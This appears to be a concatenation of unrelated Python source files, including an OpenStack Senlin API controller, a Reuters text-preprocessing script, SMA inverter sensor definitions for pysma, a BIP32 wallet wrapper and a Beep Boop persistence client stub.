# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ClusterPolicies endpoint for Senlin v1 ReST API.
"""
from webob import exc
from senlin.api.openstack.v1 import util
from senlin.common import serializers
from senlin.common import wsgi
from senlin.rpc import client as rpc_client
class ClusterPolicyController(object):
    """WSGI controller exposing cluster-policy bindings (Senlin v1 API)."""

    # Request scope name; must match the corresponding entry in policy.json.
    REQUEST_SCOPE = 'cluster_policies'

    def __init__(self, options):
        self.options = options
        self.rpc_client = rpc_client.EngineClient()

    def default(self, req, **args):
        """Reject any route that has no dedicated handler."""
        raise exc.HTTPNotFound()

    @util.policy_enforce
    def index(self, req, cluster_id):
        """List the policies attached to the given cluster."""
        allowed_filters = {
            'priority': 'single',
            'level': 'single',
            'cooldown': 'single',
            'enabled': 'single',
        }
        allowed_params = {
            'sort_dir': 'single',
            'sort_keys': 'multi',
        }
        sort_params = util.get_allowed_params(req.params, allowed_params)
        # An empty filter dict is passed down to the engine as None.
        filters = util.get_allowed_params(req.params, allowed_filters) or None
        policies = self.rpc_client.cluster_policy_list(req.context,
                                                       cluster_id=cluster_id,
                                                       filters=filters,
                                                       **sort_params)
        return {'cluster_policies': policies}

    @util.policy_enforce
    def get(self, req, cluster_id, policy_id):
        """Show the binding between one cluster and one policy."""
        binding = self.rpc_client.cluster_policy_get(req.context,
                                                     cluster_id=cluster_id,
                                                     policy_id=policy_id)
        return {'cluster_policy': binding}
def create_resource(options):
    """Build the WSGI resource wrapping ClusterPolicyController."""
    controller = ClusterPolicyController(options)
    deserializer = wsgi.JSONRequestDeserializer()
    serializer = serializers.JSONResponseSerializer()
    return wsgi.Resource(controller, deserializer, serializer)
| StarcoderdataPython |
8008412 | import numpy as np
import pandas as pd
from nltk.corpus import reuters
import text_clean as tc

# Build train/test corpora for two Reuters categories and pre-clean them
# for a word2vec-style (string) and a bag-of-words (token) pipeline.

# quick summary of the reuters corpus
print("$$$ The reuters corpus has {} tags".format(len(reuters.categories())))
print("$$$ The reuters corpus has {} documents".format(len(reuters.fileids())))

# create counter to summarize
categories = []
file_count = []

# count each tag's number of documents
for i in reuters.categories():
    """print("$ There are {} documents included in topic \"{}\""
        .format(len(reuters.fileids(i)), i))"""
    file_count.append(len(reuters.fileids(i)))
    categories.append(i)

# create a dataframe out of the counts, most frequent category first
df = pd.DataFrame(
    {'categories': categories, "file_count": file_count}) \
    .sort_values('file_count', ascending=False)
print(df.head())

# Select documents that only contains top two labels with most documents
# NOTE(review): iloc rows 1..2 are taken, so the single most frequent
# category (row 0) is skipped — confirm whether that is intended.
cat_start = 1
cat_end = 2
category_filter = df.iloc[cat_start:cat_end + 1, 0].values.tolist()
print(f"The following categories are selected for the analysis: \
{category_filter}")

# select fileid with the category filter
doc_list = np.array(reuters.fileids(category_filter))
# 'training/3267' is excluded — presumably a known bad document; verify.
doc_list = doc_list[doc_list != 'training/3267']
test_doc = doc_list[['test' in x for x in doc_list]]
train_doc = doc_list[['training' in x for x in doc_list]]
# Join each document's word list back into a single whitespace string.
test_corpus = [" ".join([t for t in reuters.words(test_doc[t])])
               for t in range(len(test_doc))]
train_corpus = [" ".join([t for t in reuters.words(train_doc[t])])
                for t in range(len(train_doc))]

# create clean corpus for word2vec approach
test_clean_string = tc.clean_corpus(test_corpus)
train_clean_string = tc.clean_corpus(train_corpus)
print(test_clean_string[0])

# create clean corpus for bow approach
test_clean_token = tc.clean_corpus(test_corpus, string_line=False)
train_clean_token = tc.clean_corpus(train_corpus, string_line=False)
print(test_clean_token[0])

# quick look at the word frequency
test_bow, test_word_freq = tc.get_bow(test_clean_token)
train_bow, train_word_freq = tc.get_bow(train_clean_token)
| StarcoderdataPython |
3394177 | import os
# Generate the background-description file for OpenCV cascade training:
# one relative negative-image path per line.
folder = "C:/Users/Pasca/OneDrive/Dokumente/Master_3.Semester/Master_3.Semester/SYSL/Cascade_Classifier/"
neg_data = "neg_red_triangle_channel++"

# Use a context manager so the file is closed even if listdir/write raises
# (the previous explicit f.close() leaked the handle on error).
with open(folder + neg_data + "_bg.txt", "w") as f:
    for img in os.listdir(folder + neg_data):
        f.write(neg_data + "/" + img + "\n")
| StarcoderdataPython |
1612439 | <filename>pysma/definitions.py
"""Sensor definitions for SMA WebConnect library for Python."""
from .const import (
DEVCLASS_BATTERY,
DEVCLASS_ENERGY_METER,
DEVCLASS_INVERTER,
DEVICE_INFO,
ENERGY_METER_VIA_INVERTER,
JMESPATHS_TAG,
OPTIMIZERS_VIA_INVERTER,
)
from .sensor import Sensor
# Status - Operation
#: Status of the device
status = Sensor("6180_08214800", "status", path=JMESPATHS_TAG, l10n_translate=True)
#: General operating status
operating_status_general = Sensor(
"6180_08412800",
"operating_status_general",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
# Status - Operation - Inverter
#: General operating status
inverter_condition = Sensor(
"6180_08414C00",
"inverter_condition",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
#: Inverter Condition
inverter_system_init = Sensor(
"6800_08811F00",
"inverter_system_init",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
#: Grid connection status
grid_connection_status = Sensor(
"6180_0846A700",
"grid_connection_status",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
#: Grid relay status
grid_relay_status = Sensor(
"6180_08416400",
"grid_relay_status",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
# DC side - DC measurements PV
#: Current power generated by the solar panels (A side)
pv_power_a = Sensor("6380_40251E00_0", "pv_power_a", unit="W")
#: Current power generated by the solar panels (B side)
pv_power_b = Sensor("6380_40251E00_1", "pv_power_b", unit="W")
#: Current voltage generated by the solar panels (A side)
pv_voltage_a = Sensor("6380_40451F00_0", "pv_voltage_a", unit="V", factor=100)
#: Current voltage generated by the solar panels (B side)
pv_voltage_b = Sensor("6380_40451F00_1", "pv_voltage_b", unit="V", factor=100)
#: Current amperage generated by the solar panels (A side)
pv_current_a = Sensor("6380_40452100_0", "pv_current_a", unit="A", factor=1000)
#: Current amperage generated by the solar panels (B side)
pv_current_b = Sensor("6380_40452100_1", "pv_current_b", unit="A", factor=1000)
# DC Side - Insulation monitoring
#: Insulation residual current
insulation_residual_current = Sensor(
"6102_40254E00", "insulation_residual_current", unit="mA"
)
# AC Side - Grid measurements
#: Power supplied to the grid. grid_power = power_l1 + power_l2 + power_l3
grid_power = Sensor("6100_40263F00", "grid_power", unit="W")
#: Grid frequency
frequency = Sensor("6100_00465700", "frequency", unit="Hz", factor=100)
# AC Side - Grid measurements - Active power
#: Power for phase 1
power_l1 = Sensor("6100_40464000", "power_l1", unit="W", enabled=False)
#: Power for phase 2
power_l2 = Sensor("6100_40464100", "power_l2", unit="W", enabled=False)
#: Power for phase 3
power_l3 = Sensor("6100_40464200", "power_l3", unit="W", enabled=False)
# AC Side - Grid measurements - Reactive power
#: Total Reactive Power
grid_reactive_power = Sensor("6100_40265F00", "grid_reactive_power", unit="var")
#: Reactive Power for phase 1
grid_reactive_power_l1 = Sensor(
"6100_40666000", "grid_reactive_power_l1", unit="var", enabled=False
)
#: Reactive Power for phase 2
grid_reactive_power_l2 = Sensor(
"6100_40666100", "grid_reactive_power_l2", unit="var", enabled=False
)
#: Reactive Power for phase 3
grid_reactive_power_l3 = Sensor(
"6100_40666200", "grid_reactive_power_l3", unit="var", enabled=False
)
# AC Side - Grid measurements - Apparent power
#: Total Apparent Power
grid_apparent_power = Sensor("6100_40666700", "grid_apparent_power", unit="VA")
#: Apparent Power for phase 1
grid_apparent_power_l1 = Sensor(
"6100_40666800", "grid_apparent_power_l1", unit="VA", enabled=False
)
#: Apparent Power for phase 2
grid_apparent_power_l2 = Sensor(
"6100_40666900", "grid_apparent_power_l2", unit="VA", enabled=False
)
#: Apparent Power for phase 3
grid_apparent_power_l3 = Sensor(
"6100_40666A00", "grid_apparent_power_l3", unit="VA", enabled=False
)
# AC Side - Grid measurements - Power factor
#: Grid Power factor
grid_power_factor = Sensor(
"6100_00665900", "grid_power_factor", unit="", factor=1000, enabled=False
)
#: Grid Power factor excitation
grid_power_factor_excitation = Sensor(
"6180_08465A00",
"grid_power_factor_excitation",
path=JMESPATHS_TAG,
l10n_translate=True,
enabled=False,
)
# AC Side - Grid measurements - Phase Current
#: Current for phase 1
current_l1 = Sensor("6100_40465300", "current_l1", unit="A", factor=1000, enabled=False)
#: Current for phase 2
current_l2 = Sensor("6100_40465400", "current_l2", unit="A", factor=1000, enabled=False)
#: Current for phase 3
current_l3 = Sensor("6100_40465500", "current_l3", unit="A", factor=1000, enabled=False)
#: Total Current
current_total = Sensor("6100_00664F00", "current_total", unit="A", factor=1000)
# AC Side - Grid measurements - Phase voltage
#: Voltage for phase 1
voltage_l1 = Sensor("6100_00464800", "voltage_l1", unit="V", factor=100)
#: Voltage for phase 2
voltage_l2 = Sensor("6100_00464900", "voltage_l2", unit="V", factor=100)
#: Voltage for phase 3
voltage_l3 = Sensor("6100_00464A00", "voltage_l3", unit="V", factor=100)
# AC Side - Measured values - energy
#: Total power yield from a solar installation
total_yield = Sensor("6400_00260100", "total_yield", unit="kWh", factor=1000)
#: The solar plant's yield for today
daily_yield = Sensor("6400_00262200", "daily_yield", unit="Wh")
# AC Side - Measured values - Grid measurements
#: Power supplied to grid measured by energy meter
metering_power_supplied = Sensor("6100_40463600", "metering_power_supplied", unit="W")
#: Power absorbed from the grid measured by energy meter
metering_power_absorbed = Sensor("6100_40463700", "metering_power_absorbed", unit="W")
#: Grid frequency measured by energy meter
metering_frequency = Sensor(
"6100_00468100", "metering_frequency", unit="Hz", factor=100
)
#: Total power supplied to the grid measured by energy meter
metering_total_yield = Sensor(
"6400_00462400", "metering_total_yield", unit="kWh", factor=1000
)
#: Total power from the grid measured by energy meter
metering_total_absorbed = Sensor(
"6400_00462500", "metering_total_absorbed", unit="kWh", factor=1000
)
# AC Side - Measured values - Phase currents
#: Current for phase 1 measured by energy meter
metering_current_l1 = Sensor(
"6100_40466500", "metering_current_l1", unit="A", factor=1000
)
#: Current for phase 2 measured by energy meter
metering_current_l2 = Sensor(
"6100_40466600", "metering_current_l2", unit="A", factor=1000
)
#: Current for phase 3 measured by energy meter
metering_current_l3 = Sensor(
"6100_40466B00", "metering_current_l3", unit="A", factor=1000
)
# AC Side - Measured values - Phase voltage
#: Voltage for phase 1 measured by energy meter
metering_voltage_l1 = Sensor(
"6100_0046E500", "metering_voltage_l1", unit="V", factor=100
)
#: Voltage for phase 2 measured by energy meter
metering_voltage_l2 = Sensor(
"6100_0046E600", "metering_voltage_l2", unit="V", factor=100
)
#: Voltage for phase 3 measured by energy meter
metering_voltage_l3 = Sensor(
"6100_0046E700", "metering_voltage_l3", unit="V", factor=100
)
# AC Side - Electricity meter - Measured values - Active power feed-in
#: Active Power for phase 1 measured by energy meter
metering_active_power_l1 = Sensor("6100_0046E800", "metering_active_power_l1", unit="W")
#: Active Power for phase 2 measured by energy meter
metering_active_power_l2 = Sensor("6100_0046E900", "metering_active_power_l2", unit="W")
#: Active Power for phase 3 measured by energy meter
metering_active_power_l3 = Sensor("6100_0046EA00", "metering_active_power_l3", unit="W")
# AC Side - Electricity meter - Measured values - Active power drawn
#: Active Power Consumed for phase 1 measured by energy meter
metering_active_power_consumed_l1 = Sensor(
"6100_0046EB00", "metering_active_power_consumed_l1", unit="W"
)
#: Active Power Consumed for phase 2 measured by energy meter
metering_active_power_consumed_l2 = Sensor(
"6100_0046EC00", "metering_active_power_consumed_l2", unit="W"
)
#: Active Power Consumed for phase 3 measured by energy meter
metering_active_power_consumed_l3 = Sensor(
"6100_0046ED00", "metering_active_power_consumed_l3", unit="W"
)
# AC Side - PV generation
#: Total kWh generated to date
pv_gen_meter = Sensor("6400_0046C300", "pv_gen_meter", unit="kWh", factor=1000)
# PV Inverter Optimizers
#: Serial number of optimizer
optimizer_serial = Sensor("6800_10852600", "optimizer_serial")
#: Power supplied by optimizer
optimizer_power = Sensor("6100_40652A00", "optimizer_power", unit="W")
#: Current supplied by optimizer
optimizer_current = Sensor(
"6100_40652900", "optimizer_current", unit="A", factor=1000, enabled=False
)
#: Voltage supplied by optimizer
optimizer_voltage = Sensor(
"6100_40652800", "optimizer_voltage", unit="V", factor=100, enabled=False
)
#: Temperature of optimizer
optimizer_temp = Sensor(
"6100_40652B00", "optimizer_temp", unit="C", factor=10, enabled=False
)
# Battery (inverter) - Battery (general parameters)
#: Total battery state of charge
battery_soc_total = Sensor("6100_00295A00", "battery_soc_total", unit="%")
#: State of charge battery A
battery_soc_a = Sensor("6100_00498F00_0", "battery_soc_a", unit="%", enabled=False)
#: State of charge battery B
battery_soc_b = Sensor("6100_00498F00_1", "battery_soc_b", unit="%", enabled=False)
#: State of charge battery C
battery_soc_c = Sensor("6100_00498F00_2", "battery_soc_c", unit="%", enabled=False)
#: Voltage battery A
battery_voltage_a = Sensor("6100_00495C00_0", "battery_voltage_a", unit="V", factor=100)
#: Voltage battery B
battery_voltage_b = Sensor("6100_00495C00_1", "battery_voltage_b", unit="V", factor=100)
#: Voltage battery C
battery_voltage_c = Sensor("6100_00495C00_2", "battery_voltage_c", unit="V", factor=100)
#: Current battery A
battery_current_a = Sensor(
"6100_40495D00_0", "battery_current_a", unit="A", factor=1000
)
#: Current battery B
battery_current_b = Sensor(
"6100_40495D00_1", "battery_current_b", unit="A", factor=1000
)
#: Current battery C
battery_current_c = Sensor(
"6100_40495D00_2", "battery_current_c", unit="A", factor=1000
)
#: Temperature battery A
battery_temp_a = Sensor("6100_40495B00_0", "battery_temp_a", unit="C", factor=10)
#: Temperature battery B
battery_temp_b = Sensor("6100_40495B00_1", "battery_temp_b", unit="C", factor=10)
#: Temperature battery C
battery_temp_c = Sensor("6100_40495B00_2", "battery_temp_c", unit="C", factor=10)
#: Battery status operating mode
battery_status_operating_mode = Sensor(
"6180_08495E00",
"battery_status_operating_mode",
path=JMESPATHS_TAG,
l10n_translate=True,
)
# Battery (inverter) - Diagnosis
#: Total battery capacity
battery_capacity_total = Sensor("6100_00696E00", "battery_capacity_total", unit="%")
#: Capacity battery A
battery_capacity_a = Sensor(
"6100_00499100_0", "battery_capacity_a", unit="%", enabled=False
)
#: Capacity battery B
battery_capacity_b = Sensor(
"6100_00499100_1", "battery_capacity_b", unit="%", enabled=False
)
#: Capacity battery C
battery_capacity_c = Sensor(
"6100_00499100_2", "battery_capacity_c", unit="%", enabled=False
)
# Battery (inverter) - Charge (voltage)
#: Charging voltage battery A
battery_charging_voltage_a = Sensor(
"6102_00493500_0", "battery_charging_voltage_a", unit="V", factor=100
)
#: Charging voltage battery B
battery_charging_voltage_b = Sensor(
"6102_00493500_1", "battery_charging_voltage_b", unit="V", factor=100
)
#: Charging voltage battery C
battery_charging_voltage_c = Sensor(
"6102_00493500_2", "battery_charging_voltage_c", unit="V", factor=100
)
# Battery (inverter) - Battery charge (power & energy)
#: Total charging power
battery_power_charge_total = Sensor(
"6100_00496900", "battery_power_charge_total", unit="W"
)
#: Charging power battery A
battery_power_charge_a = Sensor(
"6100_00499300_0", "battery_power_charge_a", unit="W", enabled=False
)
#: Charging power battery B
battery_power_charge_b = Sensor(
"6100_00499300_1", "battery_power_charge_b", unit="W", enabled=False
)
#: Charging power battery C
battery_power_charge_c = Sensor(
"6100_00499300_2", "battery_power_charge_c", unit="W", enabled=False
)
#: Total charge
battery_charge_total = Sensor(
"6400_00496700", "battery_charge_total", unit="kWh", factor=1000
)
#: Charge battery A
battery_charge_a = Sensor(
"6400_00499500_0", "battery_charge_a", unit="kWh", factor=1000, enabled=False
)
#: Charge battery B
battery_charge_b = Sensor(
"6400_00499500_1", "battery_charge_b", unit="kWh", factor=1000, enabled=False
)
#: Charge battery C
battery_charge_c = Sensor(
"6400_00499500_2", "battery_charge_c", unit="kWh", factor=1000, enabled=False
)
# Battery (inverter) - Battery discharge (power & energy)
#: Total discharging power
battery_power_discharge_total = Sensor(
"6100_00496A00", "battery_power_discharge_total", unit="W"
)
#: Discharging power battery A
battery_power_discharge_a = Sensor(
"6100_00499400_0", "battery_power_discharge_a", unit="W", enabled=False
)
#: Discharging power battery B
battery_power_discharge_b = Sensor(
"6100_00499400_1", "battery_power_discharge_b", unit="W", enabled=False
)
#: Discharging power battery C
battery_power_discharge_c = Sensor(
"6100_00499400_2", "battery_power_discharge_c", unit="W", enabled=False
)
#: Total discharge
battery_discharge_total = Sensor(
"6400_00496800", "battery_discharge_total", unit="kWh", factor=1000
)
#: Discharge battery A
battery_discharge_a = Sensor(
"6400_00499600_0", "battery_discharge_a", unit="kWh", factor=1000, enabled=False
)
#: Discharge battery B
battery_discharge_b = Sensor(
"6400_00499600_1", "battery_discharge_b", unit="kWh", factor=1000, enabled=False
)
#: Discharge battery C
battery_discharge_c = Sensor(
"6400_00499600_2", "battery_discharge_c", unit="kWh", factor=1000, enabled=False
)
# Device Parameters
# Type Label - Type Label
#: Device serial number
serial_number = Sensor("6800_00A21E00", "serial_number")
#: Device name
device_name = Sensor("6800_10821E00", "device_name")
#: Device type
device_type = Sensor(
"6800_08822000", "device_type", path=JMESPATHS_TAG, l10n_translate=True
)
#: Device manufacturer
device_manufacturer = Sensor(
"6800_08822B00", "device_manufacturer", path=JMESPATHS_TAG, l10n_translate=True
)
#: Device software version
device_sw_version = Sensor("6800_00823400", "device_sw_version")
# Device - Inverter
#: Power limit of the Inverter
inverter_power_limit = Sensor("6800_00832A00", "inverter_power_limit", unit="W")
# System communication - Meter on Speedwire
#: Serial number of energy meter
energy_meter = Sensor("6800_008AA300", "energy_meter")
sensor_map = {
DEVCLASS_INVERTER: [
status,
pv_power_a,
pv_power_b,
pv_voltage_a,
pv_voltage_b,
pv_current_a,
pv_current_b,
grid_power,
frequency,
current_l1,
current_l2,
current_l3,
voltage_l1,
voltage_l2,
voltage_l3,
power_l1,
power_l2,
power_l3,
total_yield,
daily_yield,
pv_gen_meter,
],
OPTIMIZERS_VIA_INVERTER: [
optimizer_power,
optimizer_current,
optimizer_voltage,
optimizer_temp,
],
ENERGY_METER_VIA_INVERTER: [
metering_power_supplied,
metering_power_absorbed,
metering_frequency,
metering_total_yield,
metering_total_absorbed,
metering_current_l1,
metering_current_l2,
metering_current_l3,
metering_voltage_l1,
metering_voltage_l2,
metering_voltage_l3,
metering_active_power_l1,
metering_active_power_l2,
metering_active_power_l3,
metering_active_power_consumed_l1,
metering_active_power_consumed_l2,
metering_active_power_consumed_l3,
],
DEVCLASS_BATTERY: [
battery_voltage_a,
battery_voltage_b,
battery_voltage_c,
battery_charging_voltage_a,
battery_charging_voltage_b,
battery_charging_voltage_c,
battery_current_a,
battery_current_b,
battery_current_c,
inverter_power_limit,
battery_power_charge_total,
battery_power_charge_a,
battery_power_charge_b,
battery_power_charge_c,
battery_power_discharge_total,
battery_power_discharge_a,
battery_power_discharge_b,
battery_power_discharge_c,
grid_reactive_power,
grid_reactive_power_l1,
grid_reactive_power_l2,
grid_reactive_power_l3,
grid_apparent_power,
grid_apparent_power_l1,
grid_apparent_power_l2,
grid_apparent_power_l3,
grid_power_factor,
grid_power_factor_excitation,
battery_charge_total,
battery_charge_a,
battery_charge_b,
battery_charge_c,
battery_discharge_total,
battery_discharge_a,
battery_discharge_b,
battery_discharge_c,
battery_soc_total,
battery_soc_a,
battery_soc_b,
battery_soc_c,
battery_capacity_total,
battery_capacity_a,
battery_capacity_b,
battery_capacity_c,
battery_temp_a,
battery_temp_b,
battery_temp_c,
insulation_residual_current,
inverter_condition,
operating_status_general,
battery_status_operating_mode,
grid_relay_status,
grid_connection_status,
inverter_system_init,
grid_power,
voltage_l1,
voltage_l2,
voltage_l3,
current_l1,
current_l2,
current_l3,
current_total,
frequency,
status,
],
DEVCLASS_ENERGY_METER: [
status,
grid_power,
frequency,
current_l1,
current_l2,
current_l3,
voltage_l1,
voltage_l2,
voltage_l3,
power_l1,
power_l2,
power_l3,
],
DEVICE_INFO: [
serial_number,
device_name,
device_type,
device_manufacturer,
device_sw_version,
],
}
| StarcoderdataPython |
11275227 | <gh_stars>1-10
"""
This script runs the webapp application using a development server.
"""
from os import environ
from webapp import app
from config import DEBUG
if __name__ == '__main__':
    # Host and port come from the environment when deployed; fall back to
    # sensible local-development defaults otherwise.
    host = environ.get('SERVER_HOST', 'localhost')
    port_setting = environ.get('SERVER_PORT', '5000')
    try:
        port = int(port_setting)
    except ValueError:
        # Non-numeric SERVER_PORT -- use the default port instead.
        port = 5000
    app.run(host, port, debug=DEBUG)
| StarcoderdataPython |
4979330 | from pycoin.key.BIP32Node import *
from . import config
from .interfaces.counterwalletseed import mnemonicToEntropy
import time
import json
import os
from .errors import PyPayWalletError
# Map config network names to pycoin netcodes ("XTN" is Bitcoin testnet).
NETCODES = {"mainnet": "BTC", "testnet": "XTN"}
# TODO: enable autosweep, privkey_mode only
# TODO: sweep address function
# TODO: sweep branch function
class PyPayWallet(BIP32Node):
    """
    Wallet wrapper around the Pycoin implementation. (Pycoin is a little heavier of a dependency than we need, but it already supports python3 and keypath-address handling).
    The toFile()/toEncryptedFile() methods save the public and/or private keys available to this wallet, optionally encrypted with simplecrypt. Note: you do not need the private keys to generate new addresses.
    The MasterKey or the PublicKey for the branch specified in the configfile must be loaded at startup; branches take default numbers. Currently hardened branches are not supported (hardened branches require the root key to be a private key, which should not be used).
    """

    @classmethod
    def _getNetcode(cls):
        # Pick the pycoin netcode matching the configured network.
        return NETCODES['testnet' if config.TESTNET else 'mainnet']

    @classmethod
    def fromEntropy(cls, seed, netcode=None):
        """Create a wallet from raw entropy bytes."""
        if not netcode:
            netcode = cls._getNetcode()
        return BIP32Node.from_master_secret(seed, netcode)

    @classmethod
    def fromMnemonic(cls, mnemonic, mnemonic_type=None, netcode=None):
        """Create a wallet from a mnemonic phrase.

        `mnemonic_type` names a module under .interfaces that provides
        mnemonicToEntropy().
        """
        import importlib
        if not netcode:
            netcode = cls._getNetcode()
        if not mnemonic_type:
            mnemonic_type = config.DEFAULT_MNEMONIC_TYPE
        # Fix: the original exec()'d an import statement; exec cannot rebind a
        # function local in Python 3, so the module-level default
        # mnemonicToEntropy was silently used regardless of mnemonic_type.
        interface = importlib.import_module(
            '.interfaces.%s' % mnemonic_type, package=__package__)
        seed = interface.mnemonicToEntropy(mnemonic)
        return cls.from_master_secret(seed, netcode=netcode)

    @classmethod
    def fromFile(cls, password=None, file_dir=None, file_name=None, netcode=None):
        """Load a wallet from a JSON file, decrypting it when necessary."""
        if file_dir is None:
            file_dir = config.DATA_DIR
        if file_name is None:
            file_name = config.DEFAULT_WALLET_FILE
        if netcode is None:
            netcode = cls._getNetcode()
        with open(os.path.join(file_dir, file_name), 'rb') as rfile:
            data = rfile.read()
        try:
            # First try to parse the file as plaintext JSON...
            if isinstance(data, bytes):
                data = data.decode('utf-8')
            wallet = json.loads(data)
        except (TypeError, UnicodeDecodeError):
            # ...otherwise assume it is simplecrypt-encrypted.
            data = cls._decryptFile(password, data)
            wallet = json.loads(data)
        return cls.fromHwif((wallet.get('privkey') or wallet.get('pubkey')),
                            keypath=wallet.get('keypath'), netcode=netcode)

    # Backward-compatible alias.
    fromEncryptedFile = fromFile

    @classmethod
    def _decryptFile(cls, password, data):
        """Decrypt raw file bytes with simplecrypt (imported lazily)."""
        import simplecrypt
        return simplecrypt.decrypt(password, data).decode('utf-8')

    @classmethod
    def fromHwif(cls, b58_str, keypath=None, netcode=None):
        """Create a wallet from a BIP32 base58-serialized key string."""
        node = BIP32Node.from_hwif(b58_str)
        return cls.fromBIP32Node(node, keypath, netcode)

    # Go figure why BIP32Node won't instantiate from an instance of itself...
    @classmethod
    def fromBIP32Node(cls, W, keypath=None, netcode=None):
        """Clone a BIP32Node into a PyPayWallet, preserving key material."""
        secret_exponent = (W._secret_exponent or None)
        public_pair = (W._public_pair if not W._secret_exponent else None)
        if not netcode:
            # NOTE(review): _getNetcode() always returns a value, so the
            # `or W._netcode` fallback looks dead -- confirm intent.
            netcode = cls._getNetcode() or W._netcode
        return PyPayWallet(
            netcode,
            W._chain_code,
            W._depth,
            W._parent_fingerprint,
            W._child_index,
            secret_exponent=secret_exponent,
            public_pair=public_pair,
            keypath=(keypath or W.__dict__.get('keypath'))
        )

    def _toFile(self, data, file_dir=None, file_name=None, force=False):
        """Write raw bytes to the wallet file.

        Refuses to overwrite an existing file unless force=True.
        (A leftover debug print of the target path was removed.)
        """
        if file_dir is None:
            file_dir = config.DATA_DIR
        if file_name is None:
            file_name = config.DEFAULT_WALLET_FILE
        target = os.path.join(file_dir, file_name)
        if os.path.isfile(target) and not force:
            raise PyPayWalletError("Could not save to file because file already exists and force=True was not specified")
        with open(target, 'wb') as wfile:
            result = wfile.write(data)
        assert (len(data) == result)
        return result

    def jsonForWallet(self, store_private=False):
        """Serialize keypath + keys to JSON bytes; privkey only on request."""
        return json.dumps({
            "keypath": self.keypath,
            "pubkey": self.hwif(),
            "privkey": (self.hwif(True) if (self.is_private() and store_private) else None)
        }).encode('utf-8')

    def toFile(self, password=None, store_private=False, **kwargs):
        """Save the wallet; encrypt with simplecrypt when a password is given.

        Fix: the password default was a redacted placeholder (invalid
        syntax); None -- i.e. no encryption -- restores a working default.
        """
        payload = self.jsonForWallet(store_private)
        if password:
            import simplecrypt
            payload = simplecrypt.encrypt(password, payload)
        self._toFile(payload, **kwargs)

    def toEncryptedFile(self, password=None, store_private=False, **kwargs):
        """Alias of toFile(); kept for backward compatibility."""
        self.toFile(password, store_private, **kwargs)

    def getCurrentAddress(self):
        """Return the public address for the current keypath."""
        return self.subkey_for_path(str(self.keypath)).address()

    def getNewAddress(self):
        """Return the public address after incrementing the keypath by 1."""
        self.keypath.incr()
        return self.getCurrentAddress()

    def __init__(self, *args, keypath=None, **kwargs):
        # Fall back to the configured (or default) keypath when none is given.
        if not keypath:
            keypath = config.KEYPATH or config.DEFAULT_KEYPATH
        self.keypath = KeyPath(keypath)
        BIP32Node.__init__(self, *args, **kwargs)
class KeyPath(list):
    """A BIP32-style address keypath (list of child indices) with helpers.

    Accepts a slash-separated string such as ``'0/1/2'``, any iterable of
    integers, or a falsy value (treated as an empty path).
    """

    def __init__(self, l, *args):
        if isinstance(l, str):
            # Parse "0/1/2" into its integer components.
            l = (int(i) for i in l.split('/'))
        elif not l:
            l = []
        list.__init__(self, l, *args)

    def __repr__(self):
        return "KeyPath('%s')" % self

    def __str__(self):
        # Render back to the canonical slash-separated form.
        return '/'.join(str(i) for i in self)

    def incr(self, x=1, pos=-1):
        """Increment the component at *pos* (default: right-most) by *x*.

        Negative components move further from zero, preserving their sign.
        """
        self[pos] += (x if self[pos] >= 0 else -x)

    def set_pos(self, x, pos):
        """Set the path component at *pos* to int(x)."""
        self[pos] = int(x)
# def dmc(x, y):
# x.__dict__[y.__name__] = y.__get__(x, x.__class__)
| StarcoderdataPython |
278266 | <gh_stars>1-10
#!/usr/bin/env python
import csv
import sys
# Internal bookkeeping columns stripped from the output CSV.
REMOVE_COLUMNS = [
    'special_designations',
    'record_created',
    'record_modified',
    'user_modified',
]


def main():
    """Copy CSV from stdin to stdout, dropping the REMOVE_COLUMNS fields.

    Rows with stray extra fields (collected by DictReader under a None key)
    make DictWriter.writerow raise ValueError and are skipped, as before.
    """
    reader = csv.DictReader(sys.stdin)
    outnames = [f for f in reader.fieldnames if f not in REMOVE_COLUMNS]
    writer = csv.DictWriter(sys.stdout, outnames)
    writer.writeheader()
    for row in reader:
        for rem in REMOVE_COLUMNS:
            # pop() (not del) so an input missing one of the columns does
            # not crash with an uncaught KeyError.
            row.pop(rem, None)
        try:
            writer.writerow(row)
        except ValueError:
            # Malformed row (extra fields) -- skip it.
            pass


if __name__ == '__main__':
    # Guarded so importing this module no longer consumes stdin immediately.
    main()
| StarcoderdataPython |
1839418 | <gh_stars>10-100
# -*- coding: utf-8 -*-
# @Time : DATE:2021/10/9
# @Author : yan
# @Email : <EMAIL>
# @File : 04_bspline_fitting.py
import pclpy
from pclpy import pcl
import numpy as np
import sys
def PointCloud2Vector3d(cloud, data):
    # Stub from the original PCL NURBS-fitting example: should append each
    # XYZ point of `cloud` to the vector `data`. Not implemented in this port.
    pass
def visualizeCurve(curve, surface, viewer):
    # Stub from the original PCL NURBS-fitting example: should render the
    # fitted B-spline curve on the surface in `viewer`. Not implemented.
    pass
if __name__ == '__main__':
    # Require an input PCD path and an output .3dm path on the command line.
    if len(sys.argv) < 3:
        print('Usage: pcl_example_nurbs_fitting_surface pcd<PointXYZ>-in-file 3dm-out-file')
        exit(0)
    pcd_file = sys.argv[1]
    file_3dm = sys.argv[2]  # NOTE(review): output path is currently unused
    viewer = pcl.visualization.PCLVisualizer()
    viewer.setSize(800, 600)
    # Load the point cloud data
    cloud = pcl.PointCloud.PointXYZ()
    if pcl.io.loadPCDFile(pcd_file, cloud) < 0:
        print(' PCD file not found.')
        exit(-1)
    # Render the cloud in blue with 3px points.
    blue = pcl.visualization.PointCloudColorHandlerCustom.PointXYZ(cloud, 0.0, 0.0, 255.0)
    viewer.addPointCloud(cloud, blue, "cloud")
    viewer.setPointCloudRenderingProperties(0, 3, "cloud")
    # Spin the visualizer until the window is closed.
    while not viewer.wasStopped():
        viewer.spinOnce(10)
| StarcoderdataPython |
4804961 | import requests
import os
import json
"""
Defines a connection to a Persist Key/Value Store
"""
class PersistStore:
    """Thin HTTP client for the Beep Boop Persist key/value store.

    Reads the bearer token from the BEEPBOOP_TOKEN environment variable at
    construction time.
    """

    def __init__(self):
        self.base_url = 'https://beepboophq.com/api/v1/persist/kv'
        self.token = os.getenv("BEEPBOOP_TOKEN", "")

    def list_keys(self):
        """Return the parsed JSON listing of all keys in the store."""
